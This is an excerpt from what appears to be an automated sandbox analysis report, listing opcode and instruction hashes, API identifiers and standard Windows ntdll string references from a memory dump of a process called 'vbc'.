                                                                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                  • Instruction ID: 7d67362d5406408e9b0ab5542a0e5fa14be85dde5c0430ef21a2fb511d4e9630
                                                                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                  • Instruction Fuzzy Hash: 68D01236200288EFCB05DF41C894D9A772AFBC8710F109419FD19076108A31ED62DA50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                  • Instruction ID: e587f5ccc99de7b22c095c3ba163f47d5c9f7f8dc20d86cbb5fa91ade93433c6
                                                                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                  • Instruction Fuzzy Hash: A5C08838300A808FCF08CF2AC288F0833F8FB00B80F000C80E802CBB20E228E800CA00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                                                  • Instruction ID: b3d4f77a998e5318192812f5bc3f605886e9c8afb32416f408666fbf6d89aada
                                                                                                                                                  • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                                                  • Instruction Fuzzy Hash: 96C09B2F1556C149CD178F3553127E4BF61D7425D4F5D14C5D4D11F513C1144653D725
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                                  • Instruction ID: 8e318948ef0d19a9e84d8ba7d78fbed1e654c9886ed0682395363e187699078c
                                                                                                                                                  • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                                  • Instruction Fuzzy Hash: 65B01232312544CFC7026720CB44F1833A9BF017D0F0904F0650089831D6188A10F501
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc541d8b4e37d77086c63edf13b0cbe65718c8b239db381fe283de04200a9064
                                                                                                                                                  • Instruction ID: 848c2418541bd606e10d10482efbadacede29a8c8e896c8e493e180c12b8efed
                                                                                                                                                  • Opcode Fuzzy Hash: bc541d8b4e37d77086c63edf13b0cbe65718c8b239db381fe283de04200a9064
                                                                                                                                                  • Instruction Fuzzy Hash: 7D9002A260150042454471584848406601597E27013D5C515A0558660C8A188955926E
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bae585c897ce8b8b69c03910bf12eb896cc9d45b4ea354486185af502bac98f2
• Instruction ID: ecf0b3bf0ff97590f9adf94e8b0f276cb00c7878fb0e3534ec29ec97a49ed6c7
• Opcode Fuzzy Hash: bae585c897ce8b8b69c03910bf12eb896cc9d45b4ea354486185af502bac98f2
• Instruction Fuzzy Hash: 7F900272605800129544715848C8546401597E1701B95C411E0428654C8E148A565366
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 376e10483fec35867f1e7f051be53fbda8600615a5ab32f3177272f07e2cba07
• Instruction ID: fe8b739654745065a73825d4ee48e25cb74cd856335dffff23a480a35e5f30f9
• Opcode Fuzzy Hash: 376e10483fec35867f1e7f051be53fbda8600615a5ab32f3177272f07e2cba07
• Instruction Fuzzy Hash: 6690027224140402D54571584448606001997D1641FD5C412A0428654E8A558B56AA66
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a0ddeda90d3503e95eebc72726a174ff6a658a9871dd8bf8d944f00bc197aa5
• Instruction ID: cdb4317cff3b7ca3f8498dd6a09e76b3f04b5676cce2ef83c28dd24e1f62d8ec
• Opcode Fuzzy Hash: 3a0ddeda90d3503e95eebc72726a174ff6a658a9871dd8bf8d944f00bc197aa5
• Instruction Fuzzy Hash: 6E90026220544442D5047558544CA06001587D1605F95D411A1068695DCA358951A136
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92226b2d8cabfd48fb661fd2ea1a2e0faf632a7afb6f6f855c7b6a5bf71aef21
• Instruction ID: 47986a541385b88968616367f5871d5a5c124e1f86c82412b62ac9eb6364e629
• Opcode Fuzzy Hash: 92226b2d8cabfd48fb661fd2ea1a2e0faf632a7afb6f6f855c7b6a5bf71aef21
• Instruction Fuzzy Hash: 5B90026260540402D5447158545C706002587D1601F95D411A0028654DCA598B5566A6
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f01a466969a2fec85921cc0205d965b98bddf87bf67be25446046da7541bdec6
• Instruction ID: b50d44a2819ee15c5f460147fe6bdd2900d809e483ebb9ce76b68b00cfe38a95
• Opcode Fuzzy Hash: f01a466969a2fec85921cc0205d965b98bddf87bf67be25446046da7541bdec6
• Instruction Fuzzy Hash: BF90027220140403D5047158554C707001587D1601F95D811A0428658DDA5689516126
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b48be9c1d8506e128d4bf85439b4b008b0341646830a78811ec2702b906dac51
• Instruction ID: 6f9fbaaec50b4c3e1c27a65af7d297193d1836b9e7d3fa8f4234fc810316aa5d
• Opcode Fuzzy Hash: b48be9c1d8506e128d4bf85439b4b008b0341646830a78811ec2702b906dac51
• Instruction Fuzzy Hash: 6690027220140842D50471584448B46001587E1701F95C416A0128754D8A15C9517526
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8ece4f7345ec2530a490fa5b76bb88a1e80a1735cd82864b01ef55f1e5a31c6
• Instruction ID: 86c7a2b477a8d67a0ebd4b60d617f1efa93408647dd3cc939dd19684c6249621
• Opcode Fuzzy Hash: e8ece4f7345ec2530a490fa5b76bb88a1e80a1735cd82864b01ef55f1e5a31c6
• Instruction Fuzzy Hash: 3C90027220180402D5047158484C747001587D1702F95C411A5168655E8A65C9916536
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c8c90ce1dd2449cd5ee1bd7921b498a0038817e78bda3ad3d24bb2e1466aedc
• Instruction ID: 503f9d9f5443d3b4b840da49cbef4d448701a805fbd9a61d8056143e57fed73c
• Opcode Fuzzy Hash: 3c8c90ce1dd2449cd5ee1bd7921b498a0038817e78bda3ad3d24bb2e1466aedc
• Instruction Fuzzy Hash: 6C9002A221140042D50871584448706005587E2601F95C412A2158654CC9298D61512A
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe4accbd34e546451178a54e401a10b8f7fa4d827d4fd314d317e82abcd49e0c
• Instruction ID: d9e967bd7295bf4ca0dacafb1567eb38ae0b2a5e2bee227b7a219a4a3ca397ce
• Opcode Fuzzy Hash: fe4accbd34e546451178a54e401a10b8f7fa4d827d4fd314d317e82abcd49e0c
• Instruction Fuzzy Hash: C89002A220180403D54475584848607001587D1702F95C411A2068655E8E298D51613A
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1aac8fea7ba8e88f24eca2df3dfcbfab8905338e0845da92c8e032a78ab24c7c
• Instruction ID: 111cadf5273d437937242bf89c03493af8c910d84e7700102bfedde0e1763773
• Opcode Fuzzy Hash: 1aac8fea7ba8e88f24eca2df3dfcbfab8905338e0845da92c8e032a78ab24c7c
• Instruction Fuzzy Hash: BD90026230140402D506715844586060019C7D2745FD5C412E1428655D8A258A53A137
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 44f50b92ee9f8b1668d0b56ce5740df1369cf9a91acc9197b021a0932362eb3b
• Instruction ID: 49abd9a78c7a7d1e12b9d37f11023459ad4cfb2778b646b144cf5b0141ce0fc9
• Opcode Fuzzy Hash: 44f50b92ee9f8b1668d0b56ce5740df1369cf9a91acc9197b021a0932362eb3b
• Instruction Fuzzy Hash: 3690027220544842D54471584448A46002587D1705F95C411A0068794D9A258E55B666
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2962e99829a7df529b7b213d13dcc1d23c366d85d07acb17cfdf9ec1c8c0d9cb
• Instruction ID: 4277ebd4ae638d74b6eddef152e30bc69ef4bbac9158b381b823e319fb9829a6
• Opcode Fuzzy Hash: 2962e99829a7df529b7b213d13dcc1d23c366d85d07acb17cfdf9ec1c8c0d9cb
• Instruction Fuzzy Hash: DC90027220140802D50871584848686001587D1701F95C411A6028755E9A6589917136
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e710a03d2b4e3c406d70e9291b394b6c6116aa3a7b57e2eba55fce3704cbde8e
• Instruction ID: b6d88e849cd6a7b84047e14c45cbd60696bdea5f552ff85cd8f24b08a52e376e
• Opcode Fuzzy Hash: e710a03d2b4e3c406d70e9291b394b6c6116aa3a7b57e2eba55fce3704cbde8e
• Instruction Fuzzy Hash: FB90027260540802D55471584458746001587D1701F95C411A0028754D8B558B5576A6
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 24dc7be18608beeb6d8a78150e057076f2873cf007b51daed57453593c8178f6
• Instruction ID: a0f6e8cd6565a50e83678663a979b2d951ae179e1e90e2b30760d9d9036bad20
• Opcode Fuzzy Hash: 24dc7be18608beeb6d8a78150e057076f2873cf007b51daed57453593c8178f6
• Instruction Fuzzy Hash: B8900266221400020549B558064850B045597D77513D5C415F141A690CCA2189655326
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 99bed7271393c68c596d554794ede9383c48d7b6eab90390a5951542ea4c772a
• Instruction ID: 963de2485a18fb045bdb1bd3782bd2436a48ed802e3747563926c958dd8b32b0
• Opcode Fuzzy Hash: 99bed7271393c68c596d554794ede9383c48d7b6eab90390a5951542ea4c772a
• Instruction Fuzzy Hash: 579002E2201540924904B2588448B0A451587E1601B95C416E1058660CC9258951913A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3ef636c2d1b7411492e053532b8315b01ba6458bcd1f8d21ef6eec293fdc3a4f
                                                                                                                                                  • Instruction ID: 74a3315c372234f260adaf5772ce14ba3648f7faa6e70a68ccecb1b00ddefca2
                                                                                                                                                  • Opcode Fuzzy Hash: 3ef636c2d1b7411492e053532b8315b01ba6458bcd1f8d21ef6eec293fdc3a4f
                                                                                                                                                  • Instruction Fuzzy Hash: DF90027260550402D50471584558706101587D1601FA5C811A0428668D8B958A5165A7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7b5f22132a412cd16c8d15fdb6b354d5b4f13ac4f880a0fbca70d288f1219aac
                                                                                                                                                  • Instruction ID: db8b6a4fc8366c3cec857e0398ef113fe9c3f345870112a2f97215f441c0f04f
                                                                                                                                                  • Opcode Fuzzy Hash: 7b5f22132a412cd16c8d15fdb6b354d5b4f13ac4f880a0fbca70d288f1219aac
                                                                                                                                                  • Instruction Fuzzy Hash: BB90026224140802D544715884587070016C7D1A01F95C411A0028654D8A168A6566B6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e84a31787e3a56730c663ff693b52e6612699922f9883b541af17c4e95d18899
                                                                                                                                                  • Instruction ID: d5aec94fa89548ca9ffd60ccfc00798c56233a60c555af70318f35c8b5cc9b22
                                                                                                                                                  • Opcode Fuzzy Hash: e84a31787e3a56730c663ff693b52e6612699922f9883b541af17c4e95d18899
                                                                                                                                                  • Instruction Fuzzy Hash: 4F90026220184442D54472584848B0F411587E2602FD5C419A415A654CCD1589555726
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea244ca24e6ac26961535541deb748f7956e744799521c3d1971110a9f770429
                                                                                                                                                  • Instruction ID: 5d8c29554c601006d0cd423c2c0461c6f2a84a656501b4e11c4634b4a483690a
                                                                                                                                                  • Opcode Fuzzy Hash: ea244ca24e6ac26961535541deb748f7956e744799521c3d1971110a9f770429
                                                                                                                                                  • Instruction Fuzzy Hash: AD90027620140402D91471585848646005687D1701F95D811A0428658D8A5489A1A126
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 273f0aaf2a01b228467061aac03ffe366c86f4afd9295edc67fb224ef1dabeb6
                                                                                                                                                  • Instruction ID: bbd7da4b07abaa52a324fa784541531122e3de3eafffd79a6ef391ecd8a783dc
                                                                                                                                                  • Opcode Fuzzy Hash: 273f0aaf2a01b228467061aac03ffe366c86f4afd9295edc67fb224ef1dabeb6
                                                                                                                                                  • Instruction Fuzzy Hash: 1390027220240142994472585848A4E411587E2702BD5D815A0019654CCD1489615226
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32ee35df482c75628bce404941a99c2a6d9dbec7a1a66aeb269ed72d95f7c7c4
                                                                                                                                                  • Instruction ID: a0980a5df182ab06effb2c8fb5c3caf3d4fae39fe0d7f338e27e2478acb4d479
                                                                                                                                                  • Opcode Fuzzy Hash: 32ee35df482c75628bce404941a99c2a6d9dbec7a1a66aeb269ed72d95f7c7c4
                                                                                                                                                  • Instruction Fuzzy Hash: 5390026224545102D554715C44486164015A7E1601F95C421A0818694D895589556226
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction ID: 507b3742804afa6cd4dc1c171d36b355d8d207a6485a6319ece5ff7a6d98dbf8
                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction Fuzzy Hash:
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 9d7d43c8faf414cc2a4be96a754f8ef1d238d943076e64f00cac4b82ba7e04a3
• Instruction ID: 9f86d597e56567e5622aaacc35d588145855aa7a6b1486b6461ce05424181b49
• Opcode Fuzzy Hash: 9d7d43c8faf414cc2a4be96a754f8ef1d238d943076e64f00cac4b82ba7e04a3
• Instruction Fuzzy Hash: F65117B6B04116BFDF20EF99888897EF7B9BB09204B508929E4A5D3641D374DF10DBE0
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 555eab58235b36d6b966054f5ad8b5c50c277885d5a7a985be96e73d5685f1ca
• Instruction ID: b7b5b643a69b57d58384d7b18ed0b91f5ab7c59f5fa813da6a19372eacbfac97
• Opcode Fuzzy Hash: 555eab58235b36d6b966054f5ad8b5c50c277885d5a7a985be96e73d5685f1ca
• Instruction Fuzzy Hash: C5511579A04645AFCB74DF9CCC9097FBBFAEB44200B008C6AE696D7641E6B4DB00D760
Strings
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05CB4655
• Execute=1, xrefs: 05CB4713
• CLIENT(ntdll): Processing section info %ws..., xrefs: 05CB4787
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05CB4742
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05CB46FC
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05CB4725
• ExecuteOptions, xrefs: 05CB46A0
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 254f0baf94a606d5ba4989d9866ad94c0126142f4768fc4efd648f7f9c4d4951
• Instruction ID: f5d2ff900e5e562a0aa6e53cedcd407bd90722e91e8729b2c9bdfb09ee1e00b1
• Opcode Fuzzy Hash: 254f0baf94a606d5ba4989d9866ad94c0126142f4768fc4efd648f7f9c4d4951
• Instruction Fuzzy Hash: 2D51F43160421DBAEF11EBA9DC89FFA77F9FB04304F040CE9E506A7581EB71AA41DA54
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction ID: e4d36d49eb96a3a98c0988caea90779eb25460603aa6912449d63901ca6bd336
• Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: 1281D570E496499EDF28EE68C8517FEBBB2BF4531CF184919D892A72D0C7349E40C760
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: 88152e21cea76183d724128bd3f26eb2808795f51faccd511de9feda6b037476
• Instruction ID: 63dfae8ff5f40ef19a04dfdd032e8db7c561406a728fc46217af71b9786d7417
• Opcode Fuzzy Hash: 88152e21cea76183d724128bd3f26eb2808795f51faccd511de9feda6b037476
• Instruction Fuzzy Hash: 7621627AA00119ABDB50DF79CC45AFFBBF9EF44644F444926EA05E3200EB30DA019BA5
Strings
• RTL: Re-Waiting, xrefs: 05CB031E
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 05CB02E7
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 05CB02BD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  • Opcode ID: 1624d6ec400f144a7c8570b82cc81e9f9dd8b235fc73e34998a0eede991c994c
                                                                                                                                                  • Instruction ID: 30270af585d20e9da5bc75004f1961818548dbe4fda8a272198ccdb8a7ba64c8
                                                                                                                                                  • Opcode Fuzzy Hash: 1624d6ec400f144a7c8570b82cc81e9f9dd8b235fc73e34998a0eede991c994c
                                                                                                                                                  • Instruction Fuzzy Hash: D8E1C0306087419FE725CF28D888B6AB7E1BF85314F140E5DF5A69B2D1D774EA44CB42
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 05CB7BAC
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05CB7B7F
                                                                                                                                                  • RTL: Resource at %p, xrefs: 05CB7B8E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  • Opcode ID: 4a065cd6346f1f4de2cfbf8b3e78616e25bf7c36ed065ad91389eba151a595a9
                                                                                                                                                  • Instruction ID: dd768ab125e57ed8b27ff22dfe7384275142ca42bc02cf9a30ecf9ea5cddb881
                                                                                                                                                  • Opcode Fuzzy Hash: 4a065cd6346f1f4de2cfbf8b3e78616e25bf7c36ed065ad91389eba151a595a9
                                                                                                                                                  • Instruction Fuzzy Hash: 3341D3393047069FD724DE25C840B66B7E6FF85714F000E1DF95AD7680EB71E9059B91
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05CB728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 05CB72C1
